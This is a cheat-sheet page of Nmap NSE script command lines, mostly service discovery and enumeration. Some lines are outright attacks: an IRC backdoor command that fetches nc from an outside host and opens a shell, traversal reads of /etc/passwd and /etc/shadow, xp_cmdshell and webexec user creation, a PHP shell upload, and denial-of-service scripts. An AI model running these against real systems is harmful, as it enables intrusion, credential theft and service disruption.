Some really useful NSE (Nmap Scripting Engine) scripts.
Keyword-search the page (Ctrl+F) for what you need, e.g. smb, nse, or geolocation with IP addresses and Google Maps. The command lines below are copied from the usage examples in the NSE script documentation; where this page shows a single dash before an option name such as script or script-args, the real option takes two dashes (--script, --script-args), and curly quotes must be typed as straight quotes. Check each script's category in the NSE documentation before running it: scripts in the brute, dos, exploit and intrusive categories (for example broadcast-avahi-dos, http-slowloris, smb-flood and the *-brute scripts) generate noisy traffic and can disrupt or alter the target.

nmap --script acarsd-info --script-args "acarsd-info.timeout=10,acarsd-info.bytes=512" -p
nmap -p 548 --script afp-brute
nmap -sS -sV -p 548 --script=afp-ls target
nmap -p 8009 --script ajp-auth [--script-args ajp-auth.path=/login]
nmap -p 8009 --script ajp-brute
nmap -p 8009 --script ajp-headers
nmap -p 8009 --script ajp-methods
nmap -p 8009 --script ajp-request
nmap -Pn -sU -sV --script allseeingeye-info -p
nmap --script amqp-info -p5672
nmap --script asn-query [--script-args dns=]
nmap -sU --script backorifice-brute --script-args backorifice-brute.ports=
nmap --script backorifice-info --script-args backorifice-info.password=
nmap --script bacnet-info -sU -p 47808
nmap -p 8333 --script bitcoin-getaddr
nmap -p 8333 --script bitcoin-info
nmap -p 8332 --script bitcoinrpc-info --script-args creds.global=:
nmap --script bittorrent-discovery --script-args newtargets,bittorrent-discovery.torrent=
nmap -sU -p 8611,8612 --script bjnp-discover
nmap --script broadcast-ataoe-discover -e
nmap --script=broadcast-avahi-dos
nmap --script broadcast-bjnp-discover
nmap --script db2-discover
nmap -6 --script broadcast-dhcp6-discover
nmap --script broadcast-dhcp-discover
nmap --script=broadcast-dns-service-discovery
nmap --script=broadcast-dropbox-listener
nmap --script=broadcast-dropbox-listener --script-args=newtargets -Pn
nmap --script=broadcast-eigrp-discovery
nmap --script=broadcast-eigrp-discovery -e wlan0
nmap --script broadcast-igmp-discovery
nmap --script broadcast-igmp-discovery -e wlan0
nmap --script broadcast-igmp-discovery
nmap --script broadcast-listener
nmap --script broadcast-listener -e eth0
nmap --script broadcast-ms-sql-discover
nmap --script broadcast-ms-sql-discover,ms-sql-info --script-args=newtargets
nmap --script=broadcast-netbios-master-browser
nmap --script=broadcast-ospf2-discover
nmap --script=broadcast-ospf2-discover -e wlan0
nmap --script broadcast-pc-anywhere
nmap --script broadcast-pc-duo
nmap --script broadcast-pim-discovery
nmap --script broadcast-pim-discovery -e eth1
nmap --script broadcast-pppoe-discover
nmap --script broadcast-rip-discover
nmap --script broadcast-ripng-discover
nmap -e eth0 --script broadcast-sonicwall-discover
nmap --script broadcast-sybase-asa-discover
nmap --script broadcast-tellstick-discover
nmap --script broadcast-versant-locate
nmap --script broadcast-wake-on-lan --script-args broadcast-wake-on-lan.MAC='00:12:34:56:78:9A'
nmap --script broadcast-wpad-discover
nmap --script broadcast-wsdd-discover
nmap --script broadcast-xdmcp-discover
nmap -p 9160 --script=cassandra-brute
nmap -p 9160 --script=cassandra-info
nmap --script=cics-enum -p 23
nmap --script=cics-enum --script-args=idlist=default_cics.txt,
nmap --script=cics-info -p 23
nmap --script=cics-info --script-args cics-info.commands='logon applid(coolcics)',
nmap --script=cics-user-brute -p 23
nmap --script=cics-user-brute --script-args userdb=users.txt,
nmap --script=cics-user-enum -p 23
nmap --script=cics-user-enum --script-args userdb=users.txt,
nmap --script=citrix-brute-xml --script-args=userdb=,passdb=,ntdomain= -p 80,443,8080
nmap --script=citrix-enum-apps-xml -p 80,443,8080
nmap --script=citrix-enum-servers-xml -p 80,443,8080
nmap -sV --script clamav-exec
nmap --script clamav-exec --script-args cmd='scan',scandb='files.txt'
nmap --script clamav-exec --script-args cmd='shutdown'
nmap -p 5984 --script "couchdb-databases.nse"
nmap -p 5984 --script "couchdb-stats.nse"
nmap -p 631 --script cups-info
nmap -p 631 --script cups-queue-info
nmap -p 2401 --script cvs-brute
nmap -p 2401 --script cvs-brute-repository
nmap --script deluge-rpc-brute -p 58846
nmap -sU -p 67 --script=dhcp-discover
nmap -p 2628 --script dict-info
nmap -p 3632 --script distcc-exec --script-args="distcc-exec.cmd='id'"
nmap --script dns-blacklist --script-args='dns-blacklist.ip=
nmap -sn --script dns-blacklist
nmap --script dns-brute --script-args dns-brute.domain=foo.com,dns-brute.threads=6,dns-brute.hostlist=./hostfile.txt,newtargets -sS -p 80
nmap --script dns-brute www.foo.com
nmap -sU -p 53 --script dns-cache-snoop.nse --script-args 'dns-cache-snoop.mode=timed,dns-cache-snoop.domains={host1,host2,host3}'
nmap -sn -Pn ns1.example.com --script dns-check-zone --script-args='dns-check-zone.domain=example.com'
nmap -sU -p 53 --script dns-client-subnet-scan --script-args \
nmap --script dns-client-subnet-scan --script-args \
nmap -sU --script dns-fuzz --script-args timelimit=2h
nmap --script dns-ip6-arpa-scan --script-args='prefix=2001:0DB8::/48'
nmap -sU -p 53 --script=dns-nsec3-enum --script-args dns-nsec3-enum.domains=example.com
nmap -sSU -p 53 --script dns-nsec-enum --script-args dns-nsec-enum.domains=example.com
nmap -sSU -p 53 --script dns-nsid
nmap -sU -p 53 --script=dns-random-srcport
nmap -sU -p 53 --script=dns-random-txid
nmap -sU -p 53 --script=dns-recursion
nmap --script=dns-service-discovery -p 5353
nmap --script dns-srv-enum --script-args "dns-srv-enum.domain='example.com'"
nmap -sU -p 53 --script=dns-update --script-args=dns-update.hostname=foo.example.com,dns-update.ip=192.0.2.1
nmap -sn -PN --script=dns-zeustracker
nmap --script dns-zone-transfer.nse \
nmap --script domcon-brute -p 2050
nmap -p 2050 --script domcon-cmd --script-args domcon-cmd.cmd="show server", \
nmap --script domino-enum-users -p 1352
nmap --script dpap-brute -p 8770
nmap -p 50000 --script drda-brute
sudo nmap -PN -p445,443 --script duplicates,nbstat,ssl-cert
nmap -e interface --script eap-info [--script-args="eap-info.identity=0-user,eap-info.scan={13,50}"]
nmap --script enip-info -sU -p 44818
nmap -p 4369 --script epmd-info
nmap -p 3031 --script eppc-enum-processes
nmap -sn -Pn --script fcrdns
nmap -sV --script fingerprint-strings
nmap --script=firewalk --traceroute
nmap --script=firewalk --traceroute --script-args=firewalk.max-retries=1
nmap --script=firewalk --traceroute --script-args=firewalk.probe-timeout=400ms
nmap --script=firewalk --traceroute --script-args=firewalk.max-probed-ports=7
nmap --script firewall-bypass
nmap --script firewall-bypass --script-args firewall-bypass.helper="ftp", firewall-bypass.targetport=22
nmap --script flume-master-info -p 35871 host
nmap --script fox-info.nse -p 1911
nmap -sU -p 2302 --script=freelancer-info
local arghost = stdnse.get_script_args(SCRIPT_NAME .. ".checkhost") or "scanme.nmap.org"
nmap --script ftp-brute -p 21
nmap --script ftp-proftpd-backdoor -p 21
nmap --script ftp-vsftpd-backdoor -p 21
nmap --script ftp-vuln-cve2010-4221 -p 21
nmap --script ganglia-info --script-args ganglia-info.timeout=60,ganglia-info.bytes=1000000 -p
nmap -p 19150 --script gkrellm-info
nmap -p 70 --script gopher-ls --script-args gopher-ls.maxfiles=100
nmap -p 2947 --script gpsd-info
nmap --script hadoop-datanode-info.nse -p 50075 host
nmap --script hadoop-jobtracker-info [--script-args=hadoop-jobtracker-info.userinfo] -p 50030 host
nmap --script hadoop-namenode-info -p 50070 host
nmap --script hadoop-secondary-namenode-info -p 50090 host
nmap --script hadoop-tasktracker-info -p 50060 host
nmap --script hbase-master-info -p 60010 host
nmap --script hbase-region-info -p 60030 host
nmap --script hnap-info -p80,8080
nmap --script hostmap-bfk --script-args hostmap-bfk.prefix=hostmap-
nmap --script hostmap-crtsh --script-args 'hostmap-crtsh.prefix=hostmap-'
nmap -sn --script hostmap-crtsh
nmap --script hostmap-robtex -sn -Pn scanme.nmap.org
nmap --script=http-affiliate-id.nse --script-args http-affiliate-id.url-path=/website
nmap --script=http-apache-negotiation --script-args http-apache-negotiation.root=/root/
* https://github.com/michenriksen/nmap-scripts
nmap -p 80 --script http-auth-finder
nmap --script http-auth [--script-args http-auth.path=/login] -p80
nmap -sV --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd="uname -a", http-awstatstotals-exec.uri=/awstats/index.php'
nmap -sV --script http-awstatstotals-exec.nse
nmap -p80,8080 --script http-axis2-dir-traversal --script-args 'http-axis2-dir-traversal.file=../../../../../../../etc/issue'
nmap -p80 --script http-axis2-dir-traversal
nmap --script=http-backup-finder
nmap --script http-barracuda-dir-traversal --script-args http-max-cache-size=5000000 -p
nmap -p --script http-bigip-cookie
nmap --script http-brute -p 80
nmap -p80,443 --script http-cakephp-version
nmap --script http-chrono
nmap -p 443 --script http-cisco-anyconnect
nmap --script=http-config-backup
nmap -p 443 --script http-cookie-flags
nmap -p 80 --script http-cors
nmap -p80 --script http-default-accounts host/ip
nmap -sV --script http-dlink-backdoor
nmap --script http-domino-enum-passwords -p 80 --script-args http-domino-enum-passwords.username='patrik karlsson',http-domino-enum-passwords.password=secret
nmap --script=http-drupal-enum-users --script-args http-drupal-enum-users.root="/path/"
nmap --script http-exif-spider -p80,443
nmap --script=http-favicon.nse \
nmap --script http-fetch --script-args 'paths={/robots.txt,/favicon.ico}'
nmap --script http-fetch --script-args 'paths=.html'
nmap --script http-fetch --script-args 'url=/images,paths={.jpg,.png,.gif}'
nmap --script http-form-brute -p 80
nmap --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}' -p 80
nmap -p 80 --script=http-frontpage-login
nmap --script http-generator [--script-args http-generator.path=,http-generator.redirects=,...]
nmap -p80 www.example.com --script http-gitweb-projects-enum
nmap -p80 --script http-google-malware
nmap -p 80 www.example.com --script http-grep --script-args='match="[A-Za-z0-9%.%%%+%-]+@[A-Za-z0-9%.%%%+%-]+%.%w%w%w?%w?",breakonmatch'
nmap -p 80 www.example.com --script http-grep --script-args 'http-grep.builtins ={"mastercard", "discover"}, http-grep.url="example.html"'
nmap -sn -Pn --script http-icloud-findmyiphone --script-args='username=,password=
nmap -sn -Pn --script http-icloud-sendmsg --script-args="username=,password=,http-icloud-sendmsg.listdevices"
nmap -sn -Pn --script http-icloud-sendmsg --script-args="username=,password=,deviceindex=1,subject='subject',message='hello world.',sound=false"
nmap -p80 --script http-iis-short-name-brute
nmap --script http-iis-webdav-vuln -p80,8080
return nmap.verbosity() > 0 and "WebDAV is ENABLED. No protected folder found; check not run. If you know a protected folder, add --script-args=webdavfolder=" or nil
nmap -sV --script http-joomla-brute
nmap -sV --script http-joomla-brute
nmap -p 80 --script http-jsonp-detection
nmap -p80 --script http-litespeed-sourcecode-download --script-args http-litespeed-sourcecode-download.uri=/phpinfo.php
nmap -p8088 --script http-litespeed-sourcecode-download
nmap -n -p 80 --script http-ls test-debit.free.fr
nmap -p80 --script http-majordomo2-dir-traversal
nmap --script http-methods
nmap --script http-methods --script-args http-methods.url-path='/website'
nmap -p 80 --script http-ntlm-info --script-args http-ntlm-info.root=/root/
nmap --script http-open-proxy.nse \
nmap --script=http-open-redirect
nmap --script http-passwd --script-args http-passwd.root=/test/
nmap -p80 --script http-phpmyadmin-dir-traversal --script-args="dir='/pma/',file='../../../../../../../../etc/passwd',outfile='passwd.txt'"
nmap -p80 --script http-phpmyadmin-dir-traversal
nmap --script=http-phpself-xss -p80
nmap -sV --script http-self-xss
nmap --script http-proxy-brute -p 8080
local arg_url = stdnse.get_script_args(SCRIPT_NAME .. '.url') or 'http://scanme.nmap.org/'
nmap -p 80 --script http-put --script-args http-put.url='/uploads/rootme.php',http-put.file='/tmp/rootme.php'
nmap --script http-qnap-nas-info -p
nmap --script http-rfi-spider -p80
nmap --script http-robtex-reverse-ip --script-args http-robtex-reverse-ip.host='
nmap --script http-robtex-shared-ns
nmap -p --script http-security-headers
nmap -sV -p- --script http-shellshock
nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls
nmap --script http-sitemap-generator -p 80
nmap --script http-slowloris-check
nmap --script http-slowloris --max-parallelism 400
slowloris:set_timeout(math.min(200 * 1000, end_time - nmap.clock_ms())) -- Set a long timeout so our socket doesn't time out while it's waiting; the time left for script execution is the maximum limit.
nmap --script http-trace -d
nmap --script=http-traceroute
nmap --script=http-unsafe-output-escaping
nmap --script http-vhosts -p 80,8080,443
nmap --script http-virustotal --script-args='http-virustotal.apikey="",http-virustotal.checksum="275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f"'
nmap -p 54340 --script http-vlcstreamer-ls
nmap --script http-vmware-path-vuln -p80,443,8222,8333
nmap -sV --script http-vuln-cve2006-3392
nmap -p80 --script http-vuln-cve2006-3392 --script-args http-vuln-cve2006-3392.file=/etc/shadow
nmap --script=http-vuln-cve2009-3960 --script-args http-http-vuln-cve2009-3960.root="/root/"
nmap --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}'
nmap --script http-vuln-cve2010-2861
nmap --script http-vuln-cve2011-3192.nse [--script-args http-vuln-cve2011-3192.hostname=nmap.scanme.org] -pT:80,443
nmap --script http-vuln-cve2011-3368
nmap -sV --script http-vuln-cve2012-1823
nmap -p80 --script http-vuln-cve2012-1823 --script-args http-vuln-cve2012-1823.uri=/test.php
nmap -sV --script http-vuln-cve2013-0156
nmap -sV --script http-vuln-cve2013-0156 --script-args uri="/test/"
nmap -sV --script http-vuln-cve2013-7091
nmap -p80 --script http-vuln-cve2013-7091 --script-args http-vuln-cve2013-7091=/ZimBra
nmap -p 443 --script http-vuln-cve2014-2126
nmap -p 443 --script http-vuln-cve2014-2127
nmap -p 443 --script http-vuln-cve2014-2128
nmap -p 443 --script http-vuln-cve2014-2129
nmap --script http-vuln-cve2014-3704 --script-args http-vuln-cve2014-3704.cmd="uname -a",http-vuln-cve2014-3704.uri="/drupal"
nmap --script http-vuln-cve2014-3704 --script-args http-vuln-cve2014-3704.uri="/drupal",http-vuln-cve2014-3704.cleanup=false
nmap --script http-vuln-cve2014-8877 --script-args http-vuln-cve2014-8877.cmd="whoami",http-vuln-cve2014-8877.uri="/wordpress"
nmap --script http-vuln-cve2014-8877
nmap --script=http-vuln-cve2015-1427 --script-args command= 'ls'
nmap --script http-vuln-cve2017-1001000 --script-args http-vuln-cve2017-1001000="uri"
nmap --script http-vuln-cve2017-1001000
nmap -p --script http-vuln-cve2017-5638
nmap -p 16992 --script http-vuln-cve2017-5689
nmap -p 7547 --script=http-vuln-misfortune-cookie
nmap -sV --script http-vuln-wnr1000-creds -p80
nmap -p80 --script http-waf-detect
nmap -p80 --script http-waf-detect --script-args="http-waf-detect.aggro,http-waf-detect.uri=/testphp.vulnweb.com/artists.php" www.modsecurity.org
nmap --script=http-waf-fingerprint
nmap --script=http-waf-fingerprint --script-args http-waf-fingerprint.intensive=1
nmap --script http-webdav-scan -p80,8080
nmap -sV --script http-wordpress-brute
nmap -sV --script http-wordpress-brute
nmap -p80 --script http-wordpress-users
nmap -sV --script http-wordpress-users --script-args limit=50
nmap -sU -p 4569 --script iax2-brute
nmap -p 1344 --script icap-info
nmap -sU -p 500 --script ike-version
nmap -p 143,993 --script imap-brute
nmap -p 143,993 --script imap-ntlm-info
nmap --script informix-brute -p 9088
nmap -p 9088 --script informix-query --script-args informix-query.username=informix,informix-query.password=informix
nmap -p 9088 --script informix-tables --script-args informix-tables.username=informix,informix-tables.password=informix
sudo nmap -sn --script ip-forwarding --script-args='target=www.example.com'
nmap --script ip-geolocation-geoplugin
nmap --script ip-geolocation-ipinfodb --script-args ip-geolocation-ipinfodb.apikey=
nmap -sn -Pn --script ip-geolocation-geoplugin,ip-geolocation-map-bing --script-args ip-geolocation-map-bing.api_key=[redacted],ip-geolocation-map-bing.map_path=map.png
nmap -sn -Pn --script ip-geolocation-geoplugin,ip-geolocation-map-google --script-args ip-geolocation-map-google.api_key=[redacted],ip-geolocation-map-google.map_path=map.png
nmap -sn -Pn --script ip-geolocation-geoplugin,ip-geolocation-map-kml --script-args ip-geolocation-map-kml.map_path=map.kml
nmap --script ip-geolocation-maxmind [--script-args ip-geolocation.maxmind_db=]
nmap --script ip-https-discover
nmap --script ipidseq [--script-args probeport=port] target
nmap -sU --script ipmi-brute -p 623
nmap -sU --script ipmi-cipher-zero -p 623
nmap -sU --script ipmi-version -p 623
nmap --script=ipv6-multicast-mld-list
local arg_interface = stdnse.get_script_args(SCRIPT_NAME .. ".interface") or nmap.get_interface()
nmap -6 --script ipv6-ra-flood.nse
nmap -6 --script ipv6-ra-flood.nse --script-args 'interface=
nmap -6 --script ipv6-ra-flood.nse --script-args 'interface=,timeout=10s'
if not stdnse.get_script_args(SCRIPT_NAME .. ".interface") and not nmap.get_interface() then
local arg_interface = stdnse.get_script_args(SCRIPT_NAME .. ".interface") or nmap.get_interface()
nmap -p 6667 --script=irc-botnet-channels
nmap -p 6667 --script=irc-botnet-channels --script-args 'irc-botnet-channels.channels={chan1,chan2,chan3}'
nmap --script irc-brute -p 6667
nmap --script irc-sasl-brute -p 6667
$ nmap -d -p6667 –script=irc-unrealircd-backdoor.nse –script-args=irc-unrealircd-backdoor.command=’wget http://www.javaop.com/~ron/tmp/nc && chmod +x ./nc && ./nc -l -p 4444 -e /bin/sh’
nmap -p 3205 --script isns-info
nmap --script knx-gateway-discover -e eth0
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test'
nmap -p 389 --script ldap-brute --script-args ldap.base='"cn=users,dc=cqure,dc=net"'
nmap -p 636 --script ldap-novell-getpass --script-args \
nmap -p 389 --script ldap-rootdse
nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest,
nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest,
nmap -sU -p 9100 --script=lexmark-config
nmap --script llmnr-resolve --script-args 'llmnr-resolve.hostname=examplename' -e wlan0
nmap -e --script lltd-discovery
nmap --script lu-enum -p 23
nmap --script lu-enum --script-args lulist=lus.txt,
nmap -p 7210 --script maxdb-info
nmap -p 11211 --script membase-brute
nmap -p 8091 --script membase-http-info
nmap -p 11211 --script memcached-info
nmap --script=metasploit-info --script-args username=root,password=root
nmap --script metasploit-msgrpc-brute -p 55553
nmap --script metasploit-xmlrpc-brute -p 55553
nmap -p8728 --script mikrotik-routeros-brute
nmap --script mmouse-brute -p 51010
nmap -p 51010 --script mmouse-exec \
nmap --script modbus-discover.nse --script-args='modbus-discover.aggressive=true' -p 502
nmap -p 27017 --script mongodb-brute
nmap -p 27017 --script mongodb-databases
nmap -p 27017 --script mongodb-info
nmap --script mrinfo
nmap --script mrinfo -e eth1
nmap --script mrinfo --script-args 'mrinfo.target=172.16.0.4'
nmap -p 445 --script ms-sql-brute --script-args mssql.instance-all,userdb=customuser.txt,passdb=custompass.txt
nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt
nmap -p 1433 --script ms-sql-config --script-args mssql.username=sa,mssql.password=sa
sudo nmap -sU -p 1434 --script ms-sql-dac
nmap -p 1433 --script ms-sql-dump-hashes
nmap -p 445 --script ms-sql-empty-password --script-args mssql.instance-all
nmap -p 1433 --script ms-sql-empty-password
nmap -p 1433 --script ms-sql-hasdbaccess --script-args mssql.username=sa,mssql.password=sa
nmap -sn --script ms-sql-empty-password --script-args mssql.instance-all
nmap -p 445 --script ms-sql-info
nmap -p 1433 --script ms-sql-info --script-args mssql.instance-port=1433
nmap -p 1433 --script ms-sql-ntlm-info
nmap -p 1433 --script ms-sql-query --script-args mssql.username=sa,mssql.password=sa,ms-sql-query.query="SELECT * FROM master..syslogins"
nmap -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=sa
nmap -p 445 --script ms-sql-discover,ms-sql-empty-password,ms-sql-xp-cmdshell
— nmap -p 1433 –script ms-sql-xp-cmdshell –script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd=”net user test test /add”
nmap --script mtrace --script-args 'mtrace.fromip=172.16.45.4'
nmap -p 3306 --script mysql-audit --script-args "mysql-audit.username='root', \
nmap --script=mysql-brute
nmap -p 3306 --script mysql-dump-hashes --script-args='username=root,password=secret'
nmap --script=mysql-enum
nmap -p 3306 --script mysql-query --script-args='query=""[,username=,password=]'
local mysql_pwd = stdnse.get_script_args(SCRIPT_NAME..".pass") or "nmapFTW"
nmap -sU -p 5351 --script=nat-pmp-info
nmap -sU -p 5351 --script nat-pmp-mapport --script-args='op=map,pubport=8080,privport=8080,protocol=tcp'
nmap -sU -p 5351 --script nat-pmp-mapport --script-args='op=unmap,pubport=8080,privport=8080,protocol=tcp'
nmap -sU -p 5351 --script nat-pmp-mapport --script-args='op=unmapall,protocol=tcp'
nmap -sU -p 137 --script nbns-interfaces
sudo nmap -sU --script nbstat.nse -p137
nmap -p 10000 --script ndmp-fs-info
nmap --script nessus-brute -p 1241
nmap -p 12345 --script netbus-auth-bypass
nmap -p 12345 --script netbus-brute
nmap -p 12345 --script netbus-info --script-args netbus-info.password=
nmap -sV -p 12345 --script netbus-version
nmap --script nexpose-brute -p 3780
nmap -p 111 --script=nfs-ls
nmap -sV --script=nfs-ls
nmap -p 111 --script=nfs-statfs
nmap -sV --script=nfs-statfs
nmap -sV --script=nje-node-brute
nmap --script=nje-node-brute --script-args=hostlist=nje_names.txt -p 175
nmap -sV --script=nje-pass-brute --script-args=ohost='POTATO',rhost='CACTUS'
nmap --script=nje-pass-brute --script-args=ohost='POTATO',rhost='CACTUS',sleep=5 -p 175
nmap -p 119,433,563 --script nntp-ntlm-info
nmap -p 9929 --script nping-brute
nmap --script nrpe-enum -p 5666
nmap -sU -p 123 --script ntp-info
nmap -sU -pU:123 -Pn -n --script=ntp-monlist
nmap -p 9390 --script omp2-brute
nmap -p 9390 --script omp2-brute,omp2-enum-targets
nmap -p 9390 --script omp2-enum-targets --script-args omp2.username=admin,omp2.password=secret
nmap --script omron-info -sU -p 9600
nmap -p 5850 --script openlookup-info
nmap --script openwebnet-discovery
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL
nmap --script oracle-brute-stealth -p 1521 --script-args oracle-brute-stealth.sid=ORCL
nmap --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt -p 1521-1560
nmap --script=oracle-sid-brute --script-args=oraclesids=/path/to/sidfile -p 1521-1560
nmap --script=oracle-sid-brute -p 1521-1560
nmap --script p2p-conficker,smb-os-discovery,smb-check-vulns --script-args=safe=1 -T4 -vv -p445
sudo nmap -sU -sS --script p2p-conficker,smb-os-discovery,smb-check-vulns --script-args=safe=1 -vv -T4 -p U:137,T:139
nmap -p139,445 -vv --script p2p-conficker,smb-os-discovery,smb-check-vulns --script-args=checkconficker=1,safe=1 -T4
nmap --script p2p-conficker,smb-os-discovery,smb-check-vulns -p- --script-args=checkall=1,safe=1 -vv -T4
nmap --script p2p-conficker,smb-os-discovery -p445 --script-args=realip=\"192.168.1.65\" -vv -T4
nmap --script path-mtu target
nmap --script=pcanywhere-brute
nmap --script pcworx-info -p 1962
nmap -p 5432 --script pgsql-brute
nmap --script=pjl-ready-message.nse \
nmap -p 110,995 --script pop3-ntlm-info
nmap --script qconn-exec --script-args qconn-exec.timeout=60,qconn-exec.bytes=1024,qconn-exec.cmd="uname -a" -p
nmap --script qscan --script-args qscan.confidence=0.95,qscan.delay=200ms,qscan.numtrips=10 target
nmap -n -sU -Pn --script quake1-info -pU:26000-26004
nmap -sU -sV -Pn --script quake3-info.nse -p
nmap -sU -p 27950 --script=quake3-master-getservers
nmap -p 3389 --script rdp-enum-encryption
nmap -p 3389 --script rdp-ntlm-info
nmap -sV --script=rdp-vuln-ms12-020 -p 3389
nmap -p 6379 --script redis-brute
nmap -p 6379 --script redis-info
nmap --script=resolveall --script-args=newtargets,resolveall.hosts={, ...} ...
nmap --script=resolveall manyaddresses.example.com
nmap --script reverse-index
nmap -p 512 --script rexec-brute
nmap -p 8098 --script riak-http-info
nmap -p 513 --script rlogin-brute
nmap --script=rmi-vuln-classloader -p 1099
nmap -p 2002 --script rpcap-brute
nmap -p 2002 --script rpcap-info
nmap -p 2002 --script rpcap-info --script-args="creds.rpcap='administrator:foobar'"
nmap --script rpc-grind
nmap --script rpc-grind --script-args 'rpc-grind.threads=8' -p
nmap -p 22,443 --script rsa-vuln-roca
nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www'
nmap -p 873 --script rsync-list-modules
nmap -p 554 --script rtsp-methods
nmap --script rtsp-url-brute -p 554
nmap --script s7-info.nse -p 102
nmap --script=samba-vuln-cve-2012-1182 -p 139
nmap -sU -p 6481 --script=servicetags
a -sV nmap scan. The ShodanAPI key can be set with the 'apikey' script
nmap --script shodan-api x.y.z.0/24 -sn -Pn -n --script-args 'shodan-api.outfile=potato.csv,shodan-api.apikey=SHODANAPIKEY'
nmap --script shodan-api --script-args 'shodan-api.target=x.y.z.a,shodan-api.apikey=SHODANAPIKEY'
nmap -sU -p 5060 --script=sip-brute
nmap --script=sip-call-spoof -sU -p 5060
nmap --script=sip-call-spoof -sU -p 5060 --script-args
nmap --script=sip-enum-users -sU -p 5060
nmap --script=sip-enum-users -sU -p 5060 --script-args
nmap --script=sip-methods -sU -p 5060
nmap --script smb-brute.nse -p445
sudo nmap -sU -sS --script smb-brute.nse -p U:137,T:139
nmap --script smb-enum-domains.nse -p445
sudo nmap -sU -sS --script smb-enum-domains.nse -p U:137,T:139
nmap --script smb-enum-users.nse -p445
sudo nmap -sU -sS --script smb-enum-users.nse -p U:137,T:139
nmap --script smb-enum-processes.nse -p445
sudo nmap -sU -sS --script smb-enum-processes.nse -p U:137,T:139
nmap --script smb-enum-services.nse -p445
nmap --script smb-enum-services.nse --script-args smbusername=,smbpass= -p445
nmap --script smb-enum-sessions.nse -p445
sudo nmap -sU -sS --script smb-enum-sessions.nse -p U:137,T:139
nmap --script smb-enum-shares.nse -p445
sudo nmap -sU -sS --script smb-enum-shares.nse -p U:137,T:139
nmap --script smb-enum-users.nse -p445
sudo nmap -sU -sS --script smb-enum-users.nse -p U:137,T:139
nmap --script smb-flood.nse -p445
sudo nmap -sU -sS --script smb-flood.nse -p U:137,T:139
nmap -p 445 --script smb-ls --script-args 'share=c$,path=\temp'
nmap -p 445 --script smb-enum-shares,smb-ls
nmap -p 445 --script smb-mbenum
standard nmap version detection information with data that this script has discovered.
nmap --script smb-os-discovery.nse -p445 127.0.0.1
sudo nmap -sU -sS --script smb-os-discovery.nse -p U:137,T:139 127.0.0.1
$ ./nmap -n -d -p445 --script=smb-psexec --script-args=smbuser=test,smbpass=test,config=examples,host=1.2.3.4 192.168.1.21
nmap --script smb-psexec.nse --script-args=smbuser=,smbpass=[,config=] -p445
sudo nmap -sU -sS --script smb-psexec.nse --script-args=smbuser=,smbpass=[,config=] -p U:137,T:139
nmap --script smb-security-mode.nse -p445 127.0.0.1
sudo nmap -sU -sS --script smb-security-mode.nse -p U:137,T:139 127.0.0.1
nmap --script smb-server-stats.nse -p445
sudo nmap -sU -sS --script smb-server-stats.nse -p U:137,T:139
nmap --script smb-system-info.nse -p445
sudo nmap -sU -sS --script smb-system-info.nse -p U:137,T:139
nmap --script smb-vuln-conficker.nse -p445
nmap -sU --script smb-vuln-conficker.nse -p T:139
nmap --script smb-vuln-cve2009-3103.nse -p445
nmap -sU --script smb-vuln-cve2009-3103.nse -p U:137,T:139
nmap --script smb-vuln-ms06-025.nse -p445
nmap -sU --script smb-vuln-ms06-025.nse -p U:137,T:139
nmap --script smb-vuln-ms07-029.nse -p445
nmap -sU --script smb-vuln-ms07-029.nse -p U:137,T:139
nmap --script smb-vuln-ms08-067.nse -p445
nmap -sU --script smb-vuln-ms08-067.nse -p U:137
* https://github.com/cldrn/nmap-nse-scripts/wiki/Notes-about-smb-vuln-ms17-010
nmap --script smb-vuln-regsvc-dos.nse -p445
nmap -sU --script smb-vuln-regsvc-dos.nse -p U:137,T:139
nmap --script smb-vuln-webexec --script-args smbusername=,smbpass= -p445
— nmap –script smb-vuln-webexec –script-args ‘smbusername=,smbpass=,webexec_command=net user test test /add’ -p139,445
— nmap –script smb-vuln-webexec –script-args ‘smbusername=,smbpass=,webexec_gui_command=cmd’ -p139,445
nmap -p 25 --script smtp-brute
nmap --script smtp-commands.nse [--script-args smtp-commands.domain=] -pT:25,465,587
nmap --script smtp-enum-users.nse [--script-args smtp-enum-users.methods={EXPN,...},...] -p 25,465,587
nmap -p 25,465,587 --script smtp-ntlm-info --script-args smtp-ntlm-info.domain=domain.com
server allows if nmap is in verbose mode otherwise the script will print the number of
nmap --script smtp-open-relay.nse [--script-args smtp-open-relay.domain=,smtp-open-relay.ip=,...] -p 25,465,587
nmap --script=smtp-vuln-cve2010-4344 --script-args="smtp-vuln-cve2010-4344.exploit" -pT:25,465,587
nmap --script=smtp-vuln-cve2010-4344 --script-args="exploit.cmd='uname -a'" -pT:25,465,587
nmap --script=smtp-vuln-cve2011-1720 --script-args='smtp.domain=' -pT:25,465,587
nmap --script=smtp-vuln-cve2011-1764 -pT:25,465,587
nmap -sU --script snmp-brute [--script-args snmp-brute.communitiesdb= ]
nmap -sU -p 161 --script snmp-hh3c-logins --script-args creds.snmp=:
nmap -sU -p 161 --script=snmp-interfaces
nmap -sU -p 161 --script snmp-ios-config --script-args creds.snmp=:
nmap -sU -p 161 --script=snmp-netstat
nmap -sU -p 161 --script=snmp-processes
nmap -sU -p 161 --script snmp-sysdescr
nmap -sU -p 161 --script=snmp-win32-services
nmap -sU -p 161 --script=snmp-win32-shares
nmap -sU -p 161 --script=snmp-win32-software
nmap -sU -p 161 --script=snmp-win32-users
nmap -p 1080 --script socks-auth-info
nmap --script socks-brute -p 1080
nmap --script=socks-open-proxy \
nmap --script ssh2-enum-algos target
